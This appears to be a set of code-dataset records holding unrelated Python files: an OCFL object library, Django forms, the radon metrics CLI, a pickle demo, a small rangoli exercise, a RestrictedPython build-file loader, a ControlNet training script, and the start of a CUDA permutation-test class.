digests_in_version:\n digests_in_version[digest] = [\n vfilepath]\n else:\n if not self.dedupe:\n digests_in_version[digest].append(vfilepath)\n manifest_to_srcfile[vfilepath] = filepath\n print('... 
%s -> %s' % (vfilepath, filepath))\n\n for digest, paths in digests_in_version.items():\n if digest not in manifest:\n manifest[digest] = paths\n else:\n for p in paths:\n manifest[digest].append(p)\n\n if self.fixity is not None:\n for fixity_type in self.fixity:\n fixities = inventory['fixity'][fixity_type]\n for digest, vfilepaths in digests_in_version.items():\n for vfilepath in vfilepaths:\n fixity_digest = file_digest(manifest_to_srcfile[vfilepath], fixity_type)\n if fixity_digest not in fixities:\n fixities[fixity_digest] = [\n vfilepath]\n else:\n fixities[fixity_digest].append(vfilepath)\n\n inventory['head'] = vdir\n inventory['versions'][vdir] = metadata.as_dict(state=state)\n return manifest_to_srcfile\n\n def build_inventory(self, path, metadata=None):\n \"\"\"Generator for building an OCFL inventory.\n\n Yields (vdir, inventory, manifest_to_srcfile) for each version in sequence,\n where vdir is the version directory name, inventory is the inventory for that\n version, and manifest_to_srcfile is a dictionary that maps filepaths in the\n manifest to actual source filepaths.\n \"\"\"\n inventory = self.start_inventory()\n versions = {}\n for vdir in os.listdir(path):\n if not vdir in self.skips:\n if not os.path.isdir(os.path.join(path, vdir)):\n pass\n else:\n vn = self.parse_version_directory(vdir)\n versions[vn] = vdir\n\n for vn in sorted(versions.keys()):\n vdir = versions[vn]\n manifest_to_srcfile = self.add_version(inventory, (os.path.join(path, vdir)), vdir, metadata=metadata)\n yield (vdir, inventory, manifest_to_srcfile)\n\n def write_object_declaration(self, objdir):\n \"\"\"Write NAMASTE object declaration to objdir.\"\"\"\n Namaste(0, 'ocfl_object_1.0').write(objdir)\n\n def write_inventory_and_sidecar(self, objdir, inventory):\n \"\"\"Write inventory and sidecar to objdir.\"\"\"\n invfilename = 'inventory.json'\n if not os.path.exists(objdir):\n os.makedirs(objdir)\n invfile = os.path.join(objdir, invfilename)\n with open(invfile, 'w') as (fh):\n json.dump(inventory, fh, sort_keys=True, indent=2)\n sidecar = os.path.join(objdir, invfilename + '.' 
+ self.digest_algorithm)\n digest = file_digest(invfile, self.digest_algorithm)\n with open(sidecar, 'w') as (fh):\n fh.write(digest + ' ' + invfilename + '\\n')\n\n def build(self, srcdir, metadata=None, objdir=None):\n \"\"\"Build an OCFL object and write to objdir if set, else print inventories.\n\n Parameters:\n srcdir - source directory with version sub-directories\n metadata - VersionMetadata object applied to all versions\n objdir - output directory for object (must not already exist), if not\n set then will just write out inventories that would have been\n created\n \"\"\"\n if self.id is None:\n raise ObjectException('Identifier is not set!')\n else:\n if objdir is not None:\n os.makedirs(objdir)\n num_versions = 0\n for vdir, inventory, manifest_to_srcfile in self.build_inventory(srcdir, metadata=metadata):\n num_versions += 1\n if objdir is None:\n self.prnt('\\n\\n### Inventory for %s\\n' % vdir)\n self.prnt(json.dumps(inventory, sort_keys=True, indent=2))\n else:\n self.write_inventory_and_sidecar(os.path.join(objdir, vdir), inventory)\n for path, srcfile in manifest_to_srcfile.items():\n dstfile = os.path.join(objdir, path)\n dstpath = os.path.dirname(dstfile)\n if not os.path.exists(dstpath):\n os.makedirs(dstpath)\n copyfile(srcfile, dstfile)\n\n if objdir is None:\n return\n self.write_object_declaration(objdir)\n self.write_inventory_and_sidecar(objdir, inventory)\n logging.info('Built object %s with %s versions' % (self.id, num_versions))\n\n def create(self, srcdir, metadata=None, objdir=None):\n \"\"\"Create a new OCFL object with v1 content from srcdir.\n\n Parameters:\n srcdir - source directory with content for v1\n metadata - VersionMetadata object for v1\n objdir - output directory for object (must not already exist), if not\n set then will just write out inventories that would have been\n created\n \"\"\"\n if self.id is None:\n raise ObjectException('Identifier is not set!')\n else:\n if objdir is not None:\n os.makedirs(objdir)\n inventory = self.start_inventory()\n vdir = 'v1'\n manifest_to_srcfile = self.add_version(inventory, srcdir, vdir, metadata=metadata)\n if objdir is None:\n self.prnt('\\n\\n### Inventory for %s\\n' % vdir)\n self.prnt(json.dumps(inventory, sort_keys=True, indent=2))\n return\n self.write_inventory_and_sidecar(os.path.join(objdir, vdir), inventory)\n self.write_object_declaration(objdir)\n self.write_inventory_and_sidecar(objdir, inventory)\n for digest, paths in inventory['manifest'].items():\n for path in paths:\n srcfile = manifest_to_srcfile[path]\n dstfile = os.path.join(objdir, path)\n dstpath = os.path.dirname(dstfile)\n if not os.path.exists(dstpath):\n os.makedirs(dstpath)\n copyfile(srcfile, dstfile)\n\n logging.info('Created OCFL object %s in %s' % (self.id, objdir))\n\n def update(self, objdir, srcdir=None, metadata=None):\n \"\"\"Update object creating a new version with content matching srcdir.\n\n Parameters:\n objdir - directory for object to be update, must contain a valid object!\n srcdir - source directory with version sub-directories\n metadata - VersionMetadata object applied to all versions\n\n If srcdir is None then the update will be just of metadata and any settings\n (such as using a new digest). 
There will be no content change between\n versions.\n \"\"\"\n validator = OCFLValidator(warnings=False, check_digests=False, lax_digests=(self.lax_digests))\n if not validator.validate(objdir):\n raise ObjectException(\"Object at '%s' is not valid, aborting\" % objdir)\n inventory = self.parse_inventory(objdir)\n self.id = inventory['id']\n old_head = inventory['head']\n versions = inventory['versions']\n head = next_version(old_head)\n logging.info('Will update %s %s -> %s' % (self.id, old_head, head))\n os.mkdir(os.path.join(objdir, head))\n old_digest_algorithm = inventory['digestAlgorithm']\n digest_algorithm = self.digest_algorithm\n if digest_algorithm is None:\n digest_algorithm = old_digest_algorithm\n else:\n if digest_algorithm != old_digest_algorithm:\n logging.info('New version with use %s instead of %s digestAlgorithm' % (\n digest_algorithm, old_digest_algorithm))\n inventory['digestAlgorithm'] = digest_algorithm\n else:\n fixity = self.fixity\n old_fixity = set(inventory['fixity'].keys()) if 'fixity' in inventory else set()\n if fixity is None:\n fixity = old_fixity.copy()\n if digest_algorithm != old_digest_algorithm:\n if old_digest_algorithm not in old_fixity:\n if 'fixity' not in inventory:\n inventory['fixity'] = {}\n inventory['fixity'][old_digest_algorithm] = inventory['manifest'].copy()\n fixity.add(old_digest_algorithm)\n else:\n fixity = set(fixity)\n if fixity != old_fixity:\n for digest in old_fixity.difference(fixity):\n inventory['fixity'].pop(digest)\n\n for digest in fixity.difference(old_fixity):\n logging.info('FIXME - need to add fixity with digest %s' % digest)\n\n if fixity != old_fixity:\n logging.info('New version will have %s instead of %s fixity' % (\n ','.join(sorted(fixity)), ','.join(sorted(old_fixity))))\n manifest = copy.deepcopy(inventory['manifest'])\n if digest_algorithm != old_digest_algorithm:\n old_to_new_digest = {}\n new_manifest = {}\n for old_digest, files in manifest.items():\n digest = file_digest(os.path.join(objdir, files[0]), digest_algorithm)\n old_to_new_digest[old_digest] = digest\n for file in files[1:]:\n d = file_digest(os.path.join(objdir, file), digest_algorithm)\n if d != digest:\n raise ObjectException('Failed sanity check - files %s and %s should have same %s digest but calculated %s and %s respectively' % files[0], file, digest_algorithm, digest, d)\n\n new_manifest[digest] = manifest[old_digest]\n\n manifest = new_manifest\n for vdir in inventory['versions']:\n old_state = inventory['versions'][vdir]['state']\n state = {}\n for old_digest, files in old_state.items():\n state[old_to_new_digest[old_digest]] = old_state[old_digest]\n\n inventory['versions'][vdir]['state'] = state\n\n inventory['manifest'] = manifest\n if srcdir is None:\n inventory['head'] = head\n state = copy.deepcopy(inventory['versions'][old_head]['state'])\n inventory['versions'][head] = metadata.as_dict(state=state)\n else:\n manifest_to_srcfile = self.add_version(inventory=inventory, srcdir=srcdir, vdir=head, metadata=metadata)\n print('m2s ' + str(manifest_to_srcfile))\n for path, srcfile in manifest_to_srcfile.items():\n print('--s-> %s %s' % (path, srcfile))\n dstfile = os.path.join(objdir, path)\n dstpath = os.path.dirname(dstfile)\n if not os.path.exists(dstpath):\n os.makedirs(dstpath)\n copyfile(srcfile, dstfile)\n\n self.write_inventory_and_sidecar(os.path.join(objdir, head), inventory)\n self.write_inventory_and_sidecar(objdir, inventory)\n if digest_algorithm != old_digest_algorithm:\n os.remove(os.path.join(objdir, 'inventory.json.' 
+ old_digest_algorithm))\n logging.info('Updated OCFL object %s in %s by adding %s' % (self.id, objdir, head))\n\n def _show_indent(self, level, last=False, last_v=False):\n \"\"\"Indent string for tree view at level for intermediate or last.\"\"\"\n tree_next = '├── '\n tree_last = '└── '\n tree_pass = '│ '\n tree_indent = ' '\n if level == 0:\n if last:\n return tree_last\n return tree_next\n else:\n return (tree_indent if last else tree_pass) + (tree_last if last_v else tree_next)\n\n def show(self, objdir):\n \"\"\"Show OCFL object at objdir.\"\"\"\n validator = OCFLValidator(warnings=False, check_digests=False, lax_digests=(self.lax_digests))\n passed = validator.validate(objdir)\n if passed:\n self.prnt('OCFL object at %s has VALID STRUCTURE (DIGESTS NOT CHECKED) ' % objdir)\n else:\n self.prnt('OCFL object at %s is INVALID' % objdir)\n self.prnt()\n self.prnt('[' + objdir + ']')\n entries = sorted(os.listdir(objdir))\n n = 0\n seen_sidecar = False\n for entry in entries:\n n += 1\n note = entry + ' '\n v_notes = []\n if re.match('v\\\\d+$', entry):\n seen_v_sidecar = False\n for v_entry in sorted(os.listdir(os.path.join(objdir, entry))):\n v_note = v_entry + ' '\n if v_entry == 'inventory.json':\n pass\n elif v_entry.startswith('inventory.json.'):\n if seen_v_sidecar:\n v_note += '<--- multiple inventory digests?'\n seen_v_sidecar = True\n else:\n if v_entry == 'content':\n num_files = 0\n for v_dirpath, v_dirs, v_files in os.walk((os.path.join(objdir, entry, v_entry)), followlinks=True):\n num_files += len(v_files)\n\n v_note += '(%d files)' % num_files\n else:\n v_note += '<--- ???'\n v_notes.append(v_note)\n\n else:\n if entry in ('0=ocfl_object_1.0', 'inventory.json'):\n pass\n else:\n if entry.startswith('inventory.json.'):\n if seen_sidecar:\n note += '<--- multiple inventory digests?'\n seen_sidecar = True\n else:\n note += '<--- ???'\n last = n == len(entries)\n self.prnt(self._show_indent(0, last) + note)\n nn = 0\n for v_note in v_notes:\n nn += 1\n self.prnt(self._show_indent(1, last, nn == len(v_notes)) + v_note)\n\n def validate(self, objdir, warnings=False, check_digests=True):\n \"\"\"Validate OCFL object at objdir.\"\"\"\n validator = OCFLValidator(warnings=warnings, check_digests=check_digests, lax_digests=(self.lax_digests))\n passed = validator.validate(objdir)\n self.prnt(str(validator))\n if passed:\n self.prnt('OCFL object at %s is VALID' % objdir)\n else:\n self.prnt('OCFL object at %s is INVALID' % objdir)\n return passed\n\n def extract(self, objdir, version, dstdir):\n \"\"\"Extract version from object at objdir into dstdir.\n\n The dstdir itself must not exist but the parent directory must.\n\n Returns the version block from the inventory.\n \"\"\"\n inv = self.parse_inventory(objdir)\n if version == 'head':\n version = inv['head']\n logging.info('Object at %s has head %s' % (objdir, version))\n else:\n if version not in inv['versions']:\n raise ObjectException(\"Object at %s does not include a version '%s'\" % (objdir, version))\n if os.path.isdir(dstdir):\n raise ObjectException('Target directory %s already exists, aborting!' 
% dstdir)\n parentdir, dir = os.path.split(os.path.normpath(dstdir))\n if parentdir != '':\n if not os.path.exists(parentdir):\n raise ObjectException('Destination parent %s does not exist or is not directory' % parentdir)\n os.mkdir(dstdir)\n manifest = inv['manifest']\n state = inv['versions'][version]['state']\n for digest, logical_files in state.items():\n existing_file = manifest[digest][0]\n for logical_file in logical_files:\n logging.debug('Copying %s -> %s' % (digest, logical_file))\n dstfile = os.path.join(dstdir, logical_file)\n dstpath = os.path.dirname(dstfile)\n try:\n os.makedirs(dstpath)\n except OSError as e:\n if not os.path.isdir(dstpath):\n raise\n\n copyfile(os.path.join(objdir, existing_file), dstfile)\n\n logging.info('Extracted %s into %s' % (version, dstdir))\n return VersionMetadata(inventory=inv, vdir=version)\n\n def parse_inventory(self, path):\n \"\"\"Read JSON root inventory file for object at path.\n\n Will validate the inventory and normalize the digests so that the rest\n of the Object methods can assume correctness and matching string digests\n between state and manifest blocks.\n \"\"\"\n inv_file = os.path.join(path, 'inventory.json')\n with open(inv_file) as (fh):\n inventory = json.load(fh)\n iv = InventoryValidator()\n iv.validate(inventory)\n if iv.log.num_errors > 0:\n raise ObjectException('Root inventory is not valid (%d errors)' % iv.log.num_errors)\n digest_algorithm = iv.digest_algorithm\n manifest = inventory['manifest']\n for digest in manifest:\n norm_digest = normalized_digest(digest, digest_algorithm)\n if digest != norm_digest:\n manifest[norm_digest] = manifest[digest]\n manifest.remove(digest)\n\n for v in inventory['versions']:\n state = inventory['versions'][v]['state']\n for digest in state:\n norm_digest = normalized_digest(digest, digest_algorithm)\n if digest != norm_digest:\n state[norm_digest] = state[digest]\n state.remove(digest)\n\n return inventory\n\n def prnt(self, *objects):\n \"\"\"Print method that uses object fhout property.\n\n Avoid using Python 3 print function so we can run on 2.7 still.\n\n Can't call this 'print' in 2.7, hence 'prnt'.\n \"\"\"\n s = ' '.join(str(o) for o in objects) + '\\n'\n if sys.version_info > (3, 0):\n self.fhout.write(s)\n else:\n self.fhout.write(s.decode('utf-8'))","sub_path":"pycfiles/ocfl_py-0.0.3-py3.6/object.cpython-36.py","file_name":"object.cpython-36.py","file_ext":"py","file_size_in_byte":24953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"391185310","text":"# -*- coding: utf-8 -*-\nfrom bugurtach.models import Bugurt\nfrom django import forms\n\nclass AddBugurt(forms.ModelForm):\n class Meta:\n model = Bugurt\n fields = ('name', 'text', 'author')\n widgets = {\n 'name': forms.TextInput({'required': True}),\n 'text': forms.Textarea({'required': True}),\n 'author': forms.HiddenInput()\n }\n\nclass EditBugurt(forms.ModelForm):\n class Meta:\n model = Bugurt\n fields = ('name', 'text')\n widgets = {\n 'name': forms.TextInput(),\n 'text': forms.Textarea(),\n }\n\nclass AddTag(forms.Form):\n title = forms.CharField(label=\"\", widget=forms.TextInput(attrs={'title': 'enter one name for tag'}))\n\nclass AddProof(forms.Form):\n link = forms.CharField(label=\"\", widget=forms.TextInput(attrs={'title': 'enter one link for proof'}))","sub_path":"bugurtach/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} 
+{"seq_id":"279990843","text":"'''In this module the CLI interface is created.'''\n\nimport sys\nfrom mando import Program\ntry:\n import colorama\n colorama.init(strip=(not sys.stdout.isatty()))\n GREEN, YELLOW, RED = (colorama.Fore.GREEN, colorama.Fore.YELLOW,\n colorama.Fore.RED)\n MAGENTA, CYAN, WHITE = (colorama.Fore.MAGENTA, colorama.Fore.CYAN,\n colorama.Fore.WHITE)\n BRIGHT, RESET = colorama.Style.BRIGHT, colorama.Style.RESET_ALL\nexcept ImportError:\n # No colorama, so let's fallback to no-color mode\n GREEN = YELLOW = RED = MAGENTA = CYAN = WHITE = BRIGHT = RESET = ''\n\nimport json as json_mod\nimport collections\nfrom contextlib import contextmanager\nimport radon.complexity as cc_mod\nfrom radon.tools import iter_filenames, cc_to_dict, raw_to_dict\nfrom radon.complexity import cc_visit, cc_rank, sorted_results\nfrom radon.raw import analyze\nfrom radon.metrics import mi_visit, mi_rank\n\n__version__ = '0.5.2'\n\n\nRANKS_COLORS = {'A': GREEN, 'B': GREEN,\n 'C': YELLOW, 'D': YELLOW,\n 'E': RED, 'F': RED}\n\nLETTERS_COLORS = {'F': MAGENTA,\n 'C': CYAN,\n 'M': WHITE}\n\nMI_RANKS = {'A': GREEN, 'B': YELLOW, 'C': RED}\nTEMPLATE = '{0}{1} {reset}{2}:{3} {4} - {5}{6}{reset}'\nprogram = Program(version=__version__)\n\n\ndef log(msg, *args, **kwargs):\n '''Log a message, passing `*args` to `.format()`.\n\n `indent`, if present as a keyword argument, specifies the indent level, so\n that `indent=0` will log normally, `indent=1` will indent the message by 4\n spaces, &c..\n `noformat`, if present and True, will cause the message not to be formatted\n in any way.'''\n indent = 4 * kwargs.get('indent', 0)\n m = msg if kwargs.get('noformat', False) else msg.format(*args)\n sys.stdout.write(' ' * indent + m + '\\n')\n\n\ndef log_list(lst, **kwargs):\n '''Log an entire list, line by line.'''\n for line in lst:\n log(line, **kwargs)\n\n\ndef log_error(msg, *args, **kwargs):\n '''Log an error message. Arguments are the same as log().'''\n log('{0}{1}ERROR{2}: {3}'.format(BRIGHT, RED, RESET, msg), *args, **kwargs)\n\n\ndef _format_line(line, ranked, show_complexity=False):\n '''Format a single line. *ranked* is the rank given by the\n `~radon.complexity.rank` function. 
If *show_complexity* is True, then\n the complexity score is added.\n '''\n letter_colored = LETTERS_COLORS[line.letter] + line.letter\n rank_colored = RANKS_COLORS[ranked] + ranked\n compl = '' if not show_complexity else ' ({0}) '.format(line.complexity)\n return TEMPLATE.format(BRIGHT, letter_colored, line.lineno,\n line.col_offset, line.fullname, rank_colored,\n compl, reset=RESET)\n\n\ndef _print_cc_results(path, results, show_complexity, min, max, total_average):\n '''Print Cyclomatic Complexity results.\n\n :param path: the path of the module that has been analyzed\n :param show_complexity: if True, show the complexity score in addition to\n the complexity rank\n '''\n res = []\n counted = 0\n average_cc = .0\n for line in results:\n ranked = cc_rank(line.complexity)\n if min <= ranked <= max:\n average_cc += line.complexity\n counted += 1\n res.append(_format_line(line, ranked, show_complexity))\n elif total_average:\n average_cc += line.complexity\n counted += 1\n if res:\n log(path)\n log_list(res, indent=1)\n return average_cc, counted\n\n\ndef analyze_cc(paths, exclude, ignore, order_function, no_assert):\n '''Analyze the files located under `paths`.\n\n :param paths: A list of paths to analyze.\n :param exclude: A comma-separated string of fnmatch patterns.\n :param ignore: A comma-separated string of patterns to ignore.\n :param min: The minimum rank to output.\n :param max: The maximum rank to output.\n :param order_function: Can be `SCORE`, `LINES` or `ALPHA`, to sort the\n results respectively by CC score, line number or name.\n :param no_assert: If `True` assert statements will not be counted.'''\n for name in iter_filenames(paths, exclude, ignore):\n with _open(name) as fobj:\n try:\n results = sorted_results(cc_visit(fobj.read(),\n no_assert=no_assert),\n order_function)\n yield name, results\n except Exception as e:\n log(name)\n log_error(e, indent=1)\n continue\n\n\ndef analyze_raw(paths, exclude, ignore):\n '''Analyze the files located under `paths`.\n\n :param paths: A list of paths to analyze.\n :param exclude: A comma-separated string of fnmatch patterns.\n :param ignore: A comma-separated string of patterns to ignore.'''\n for name in iter_filenames(paths, exclude, ignore):\n with _open(name) as fobj:\n try:\n yield name, analyze(fobj.read())\n except Exception as e:\n log(name)\n log_error(e, indent=1)\n continue\n\n\n@program.command\ndef mi(multi=True, exclude=None, ignore=None, show=False, *paths):\n '''Analyze the given Python modules and compute the Maintainability Index.\n\n The maintainability index (MI) is a compound metric, with the primary aim\n being to determine how easy it will be to maintain a particular body of\n code.\n\n :param -e, --exclude : Comma separated list of patterns to exclude.\n :param -i, --ignore : Comma separated list of patterns to ignore.\n Radon won't even descend into those directories.\n :param -m, --multi: If given, multiline strings are counted as comments.\n :param -s, --show: If given, the actual MI value is shown in results.\n :param paths: The modules or packages to analyze.\n '''\n for name in iter_filenames(paths, exclude, ignore):\n with _open(name) as fobj:\n try:\n result = mi_visit(fobj.read(), multi)\n except Exception as e:\n log(name, indent=1)\n log_error(e, indent=1)\n continue\n except KeyboardInterrupt:\n log(name)\n return\n rank = mi_rank(result)\n color = MI_RANKS[rank]\n to_show = '' if not show else ' ({0:.2f})'.format(result)\n log('{0} - {1}{2}{3}{4}', name, color, rank, to_show, 
RESET)\n\n\n@program.command\ndef cc(path, min='A', max='F', show_complexity=False, average=False,\n exclude=None, ignore=None, order='SCORE', json=False, no_assert=False,\n total_average=False, *more_paths):\n '''Analyze the given Python modules and compute Cyclomatic\n Complexity (CC).\n\n The output can be filtered using the *min* and *max* flags. In addition\n to that, by default complexity score is not displayed.\n\n :param path: The path where to find modules or packages to analyze.\n :param -n, --min : The minimum complexity to display (default to A).\n :param -x, --max : The maximum complexity to display (default to F).\n :param -e, --exclude : Comma separated list of patterns to exclude.\n By default hidden directories (those starting with '.') are excluded.\n :param -i, --ignore : Comma separated list of patterns to ignore.\n If they are directory names, radon won't even descend into them.\n :param -s, --show-complexity: Whether or not to show the actual complexity\n score together with the A-F rank. Default to False.\n :param -a, --average: If True, at the end of the analysis display the\n average complexity. Default to False.\n :param --total-average: Like `-a, --average`, but it is not influenced by\n `min` and `max`. Every analyzed block is counted, no matter whether it\n is displayed or not.\n :param -o, --order : The ordering function. Can be SCORE, LINES or\n ALPHA.\n :param -j, --json: Format results in JSON.\n :param --no-assert: Do not count `assert` statements when computing\n complexity.\n :param more_paths: Additional paths to analyze.\n '''\n paths = [path] + list(more_paths)\n min = min.upper()\n max = max.upper()\n average_cc = .0\n analyzed = 0\n order_function = getattr(cc_mod, order.upper(), getattr(cc_mod, 'SCORE'))\n cc_data = analyze_cc(paths, exclude, ignore, order_function,\n no_assert)\n if json:\n result = {}\n for key, data in cc_data:\n result[key] = list(map(cc_to_dict, data))\n log(json_mod.dumps(result), noformat=True)\n else:\n for name, results in cc_data:\n cc, blocks = _print_cc_results(name, results, show_complexity, min,\n max, total_average)\n average_cc += cc\n analyzed += blocks\n\n if (average or total_average) and analyzed:\n cc = average_cc / analyzed\n ranked_cc = cc_rank(cc)\n log('\\n{0} blocks (classes, functions, methods) analyzed.', analyzed)\n log('Average complexity: {0}{1} ({2}){3}', RANKS_COLORS[ranked_cc],\n ranked_cc, cc, RESET)\n\n\n@program.command\ndef raw(exclude=None, ignore=None, summary=False, json=False, *paths):\n '''Analyze the given Python modules and compute raw metrics.\n\n Raw metrics include:\n\n * LOC: The number of lines of code (total)\n * LLOC: The number of logical lines of code\n * SLOC: The number of source lines of code (not necessarily\n corresponding to the LLOC)\n * comments: The number of Python comment lines\n * multi: The number of lines which represent multi-line strings\n * blank: The number of blank lines (or whitespace-only ones)\n\n The equation:\n\n sloc + blanks = loc\n\n should always hold.\n\n :param -e, --exclude : Comma separated list of patterns to exclude.\n By default hidden directories (those starting with '.') are excluded.\n :param -i, --ignore : Comma separated list of patterns to ignore.\n Radon won't even descend into those directories.\n :param -s, --summary: If given, at the end of the analysis display the\n summary of the gathered metrics. 
Default to False.\n :param -j, --json: Format results in JSON.\n :param paths: The modules or packages to analyze.\n '''\n headers = ['LOC', 'LLOC', 'SLOC', 'Comments', 'Multi', 'Blank']\n sum_metrics = collections.defaultdict(int, zip(headers, [0] * 6))\n\n raw_data = analyze_raw(paths, exclude, ignore)\n\n if json:\n result = {}\n for key, data in raw_data:\n result[key] = raw_to_dict(data)\n log(json_mod.dumps(result), noformat=True)\n else:\n for path, mod in raw_data:\n log(path)\n for header, value in zip(headers, mod):\n log('{0}: {1}', header, value, indent=1)\n sum_metrics[header] = sum_metrics[header] + value\n if not mod.loc:\n continue\n log('- Comment Stats', indent=1)\n comments = mod.comments\n log('(C % L): {0:.0%}', comments / (float(mod.loc) or 1), indent=2)\n log('(C % S): {0:.0%}', comments / (float(mod.sloc) or 1),\n indent=2)\n log('(C + M % L): {0:.0%}', (comments + mod.multi) / float(mod.loc),\n indent=2)\n\n if summary:\n log('** Total **')\n for header in sum_metrics:\n log('{0}: {1}', header, sum_metrics[header], indent=1)\n\n\n@contextmanager\ndef _open(path):\n \"\"\"\n :param path : file path to open ('-' for stdin)\n :returns file: open file object\n \"\"\"\n if path == '-':\n yield sys.stdin\n else:\n with open(path) as f:\n yield f\n","sub_path":"radon/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":11819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7643751","text":"#coding:utf-8\nimport pickle\ncache = {'id':123, 'name':'Alice', 'content':None}\nserialized = pickle.dumps(cache)\nprint(serialized)\nprint(serialized == cache)\ndeserialized = pickle.loads(serialized)\nprint(deserialized == cache)\nprint(deserialized is cache)\n\nprint('pickle.dump and pickle.load')\nimport os\ndir_path = os.path.abspath(os.path.dirname(__file__))\nf = open(dir_path + '/data.pk1', 'wb')\npickle.dump(cache,f)\nf.close()\nf = open(dir_path + '/data.pk1', 'rb')\ndeserialized = pickle.load(f)\nf.close()\nprint(\"deserialized == cache: %s\" % str(deserialized == cache))\n\nclass Node(object):\n def __init__(self, name):\n self.name = name\n self.edges = []\n def connect(self, node):\n self.edges.append(node)\n\na = Node('a')\nb = Node('b')\nc = Node('c')\na.connect(b)\nb.connect(c)\nc.connect(a)\nserialized = pickle.dumps(a)\ndeserialized = pickle.loads(serialized)\nprint(deserialized.edges[0].edges[0].edges[0].name)\n","sub_path":"s-cubism/18-1/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"459952241","text":"def print_rangoli(size):\n\n l = [chr(i+97) for i in xrange(size)]\n ll = []\n for i in range(size,0,-1):\n temp = l[i-1]\n for j in range(i,size):\n temp = l[j]+'-'+temp+'-'+l[j]\n ll.append(temp)\n\n for i in range(size,0,-1):\n print (i-1) * '--' + ll[size-i]+ (i-1)*'--'\n \n \n for i in range(size-1,0,-1): \n print (size-i) * '--' +ll[i-1]+(size-i) * '--'\nif __name__ == '__main__':\n n = int(raw_input())\n print_rangoli(n)","sub_path":"challenge23.py","file_name":"challenge23.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596078540","text":"from os import path\nfrom types import CodeType\n\nfrom RestrictedPython import compile_restricted as compile\nfrom RestrictedPython import safe_builtins\n\nfrom .consts import BUILD_FILE_NAME\n\n\ndef create_target_path(relpath: 
str) -> str:\n if relpath.startswith('./'):\n relpath = relpath[2:]\n\n return '//' + relpath\n\n\ndef compile_buildfile(filepath: str) -> CodeType:\n with open(filepath) as f:\n return compile(f.read(), filepath, 'exec')\n\n\nclass BuildFile:\n def __init__(self, filename: str, workspace: 'Workspace') -> None:\n self.workspace = workspace\n self.dir_path = path.dirname(filename)\n self.target = create_target_path(path.dirname(filename))\n self._compiled: CodeType = None\n\n @property\n def compiled(self):\n if self._compiled is None:\n self._compiled = compile_buildfile(path.join(\n self.dir_path,\n BUILD_FILE_NAME,\n ))\n\n return self._compiled\n\n def execute(self, build_locals: dict):\n exec(self.compiled, safe_builtins, build_locals)\n","sub_path":"forgebuild/buildfile.py","file_name":"buildfile.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"418260605","text":"try:\n #open the file correctly\n #all of the file get store in the variable\n file = open(\"order.txt\", \"r\")\n\n #Read line by line, store it in another variable (list_of_lines)\n list_of_lines = file.readlines()\n print(list_of_lines)\n\n #Iterate over the list_of_lines and print out each line :)\n for line in list_of_lines:\n print(line.rstrip('\\n'))\n\n #Clean up by closing the file\n file.close()\n\n #this is the section on error handling\nexcept FileNotFoundError as errmsg:\n print(\"don't panic, but file not found\")\n print(errmsg)\n raise\n# except:\n# print('There as been an error! Panic')\n","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"608385237","text":"from share import *\n\nimport pytorch_lightning as pl\nfrom torch.utils.data import DataLoader\nfrom tutorial_dataset import MyDataset\nfrom cldm.logger import ImageLogger\nfrom cldm.model import create_model, load_state_dict\n\n\n# Configs\nresume_path = './models/control_sd21_ini.ckpt'\nbatch_size = 4\nlogger_freq = 300\nlearning_rate = 1e-5\nsd_locked = True\nonly_mid_control = False\n\n\n# First use cpu to load models. 
Pytorch Lightning will automatically move it to GPUs.\nmodel = create_model('./models/cldm_v21.yaml').cpu()\nmodel.load_state_dict(load_state_dict(resume_path, location='cpu'))\nmodel.learning_rate = learning_rate\nmodel.sd_locked = sd_locked\nmodel.only_mid_control = only_mid_control\n\n\n# Misc\ndataset = MyDataset()\ndataloader = DataLoader(dataset, num_workers=0, batch_size=batch_size, shuffle=True)\nlogger = ImageLogger(batch_frequency=logger_freq)\ntrainer = pl.Trainer(gpus=1, precision=32, callbacks=[logger])\n\n\n# Train!\ntrainer.fit(model, dataloader)\n","sub_path":"workers/ControlNet/tutorial_train_sd21.py","file_name":"tutorial_train_sd21.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"181551824","text":"import numpy as np\nfrom numba import cuda\nfrom cuda_fill_array import fill_array_u4_v_u2, fill_array_f8_v_u2, fill_array_f8_v_u4\nimport math\n\nclass significance_of_mean_cuda(object):\n \"\"\"Fast p-value calculation.\n Credit:\n Relevant githubs:\n Micheal H: https://github.com/hoehleatsu/permtest\n Lukas Käll: https://github.com/statisticalbiotechnology/exactpermutation\n Relevant articles:\n Bert Green: A Practical Interactive Program for Randomization Tests of Location\n Marcello Pagano & David Tritchler: On Obtaining Permutation Distributions in Polynomial Time\n Jens Gebhard and Norbert Schmitz: Permutation tests- a revival?! II. An efficient algorithm for computing the critical region \n \"\"\"\n def __init__(self,num_bin = None, dtype_v=np.uint64, dtype_A=np.float64, new_version=False):\n \"\"\"\n Args:\n num_bin (int): NThe number of bins to divide each sample-set.\n dtype_v (type): The datatype of small arrays and values.\n dtype_A (type): The datatype type of large arrays.\n \"\"\"\n self.num_bin = num_bin\n self.dtype_v = dtype_v\n self.dtype_A = dtype_A\n if self.dtype_v == np.uint16 and self.dtype_A == np.uint32:\n self._get_perm = fill_array_u4_v_u2\n\n elif self.dtype_v == np.uint16 and self.dtype_A == np.float64:\n self._get_perm = fill_array_f8_v_u2\n \n elif self.dtype_v == np.uint32 and self.dtype_A == np.float64:\n self._get_perm = fill_array_f8_v_u4\n else:\n raise ValueError(\"The selected value tkype combination is currently not available!\")\n \n def _get_digitized_score(self, X, bins):\n \"\"\"Digitize the values for each sample.\n\n Args:\n X (array): 